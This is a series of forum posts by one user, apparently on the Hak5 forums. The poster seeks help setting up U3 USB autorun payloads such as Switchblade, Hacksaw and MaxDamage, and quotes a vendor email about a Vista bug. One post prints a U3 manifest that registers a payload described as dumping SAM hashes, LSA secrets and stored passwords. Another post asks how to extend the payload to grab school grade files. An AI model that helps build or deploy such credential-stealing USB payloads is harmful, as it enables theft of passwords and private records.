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Posts posted by jaz

  1. i just got this....basically all i did was copy and paste the code that was on here and edited the end like ".doc" to ".html" or something and u have to wait which is a drag and its not fast enough but ill work on this issue otherwise it the load seems alright just very slow... i put the code in switchblade and i still get the blank black box but after i leave it for ahwile it says # of files copied...

  2. Attention all U3 people i have received an email from the U3 people that the drive wont load on Vista but they are in progress of fixing it. It also when complete will be posted on the U3 software central

    heres the email they sent me:

    We have recently uncovered a bug that prevents applications using the U3 DAPI version 1.0.3 from running under Microsoft Vista. This problem occurs on host machines with one or more non-U3 USB mass storage devices attached (e.g. memory card reader-writers, etc.), which do not have their media inserted, but have drive letters assigned to the media bays at system startup.

    On these systems, the dapiQueryDomainInformation API now either hangs or returns error #0x80040210 (DAPI_E_COMM_FAIL) whenever it encounters one of these non-U3 mass storage devices.

    Our Engineering team is actively working to resolve the problem. We currently do not have a schedule for when we will release an update. We will advise you as soon we release a new version of the DAPI.

    To help end users avoid negative experiences, we will post notices on U3 Software Central this week, on the product detail pages for applications that use DAPI, stating: “Due to a recently discovered incompatibility between the U3 platform and Vista, this application will not run under Vista. U3 is working to resolve this issue and will work with the author of this program to implement an update that will resolve the issue. We regret the inconvenience caused to our user and developer community.â€

    If you have any questions, please email us at developerfeedback@u3.com

    Kind Regards,

    U3 Platform Services Team

  3. hey i used a payload that enables a vnc connection thingy and stuff to my computer....(read the thread on the forums) i was just wondering how the hell do i disable that?....cause everytime i log on my pc it says "trying to establish vnc connection" and everytime i log in it asks me about stunnel? i tried the hacksaw and stunnel and used the antidote and stunnel isnt disabled....

  4. i think you have to email me the files i have a hotmail account and gmail pm me if u prefer to email to my gmail....if urs works when i download it would it work the same with Dec C++?...

    p.s. can u give me instructions or ill just add u to my msn and u can tell me step by step and i can ask u directyl if theres a problem with it...thanks

    edit* i also updated my U3 launcher dont know if that would be a problem...but my bros has the same flash drive as me (nonupdated) so ill just take his :D

    would the update be a problem with the maxdamage?

  5. hey mine doesnt seen to work i have payload 1.1 and in documents i put the "logfiles" and i put WIP in root directory, under apps i have MaxDamage file within it is Manifest and MaxDamage.u3p (zipped file renamed) and inside manifest i have manifest u3i and icon

    so heres what it looks like


    -F:WIPCMD (with the programs inside)

    -F:SystemAppsMaxDamageManifest (has manifest.u3i and icon)

    -F:SystemAppsMaxDamage (in the zip file renamed with u3p i have the Manifest folder zipper with the icon and manifest.u3i

    heres the code i used for Manifest folder i used the exact same

     <?xml version="1.0" encoding="UTF-8"?>
    <u3manifest version="1.0">
    <application uuid="MaxDamage" version="1">
    <name>Maxdamage </name>
    <vendor url="http://hak5.org/forums/viewtopic.php?t=2361">Hak.5 Forum</vendor>
    <description>This payload gathers IP information, dumps SAM, product keys, LSA secrets, network passwords, messenger passwords, and URL history. </description>
    <upgrade appData="overwrite" deviceExec="overwrite"/>
    <appStart workingdir="%U3_DEVICE_PATH%WIPCMD" cmd="%U3_DEVICE_PATH%WIPCMDgo.cmd">start</appStart>
    <appStop workingdir="%U3_DEVICE_PATH%WIPCMD" cmd="%U3_DEVICE_PATH%WIPCMDgo.cmd">stop</appStop>

    and now the LPDB.xml file:


    <LPDB><APPLICATION guid="79EB5C19-AB0E-4dd7-BE89-BF96301D35Z8" launchOnStart="Y" lastUsed="5/24/2006 12:17:27 PM">SanDiskLaunchPadTour.u3p</APPLICATION><APPLICATION guid="EC30627F-0195-44d4-8C24-1B09F3C02C50" launchOnStart="N" lastUsed="5/24/2006 12:17:50 PM">CruzerSync-V5.6.048.u3p</APPLICATION><APPLICATION guid="285E6953-BF3C-4445-9376-3FE5D7F645B2" launchOnStart="N" lastUsed="5/24/2006 12:18:14 PM">signupshield-pm-sandisk-v04_05_15_00.u3p</APPLICATION><APPLICATION guid="1F30627F-0195-44d4-8C24-1999F3C02C50" launchOnStart="N" lastUsed="5/24/2006 12:18:42 PM">avast81.u3p</APPLICATION><APPLICATION guid="0DE4F643-C398-46ec-9339-2362F2311932" launchOnStart="N" lastUsed="5/24/2006 12:19:04 PM">Skype(</APPLICATION><APPLICATION guid="f926e6ba-0e86-43c7-973f-bdf6ea2a4d37" launchOnStart="N" lastUsed="1/5/2007 3:02:57 PM">TrueCryptU3.u3p</APPLICATION>
    <APPLICATION guid="MaxDamage" launchOnStart="N" lastUsed="30/12/2006 13:24:25">MaxDamage.u3p</APPLICATION></LPDB>

    i hope i can get some help cause to me everything looks right

  6. hey i have a Sandisk Cruzer Micro and i download a payload but then customize the downloaded payload to my liking....

    t also dumps MicroGrade CLS class files.

    can you pm me or tell me the code for this cause i also go to school and want to know how to do this...

  7. HI sorry for the stupid posts but i need someone who wouldnt mind giving their msn to me cause i dont want to add random people i need someone who knows about the hacksaw and switchblade to kind of guide me to make it work sorry if this is too much to ask....but i need help with this....

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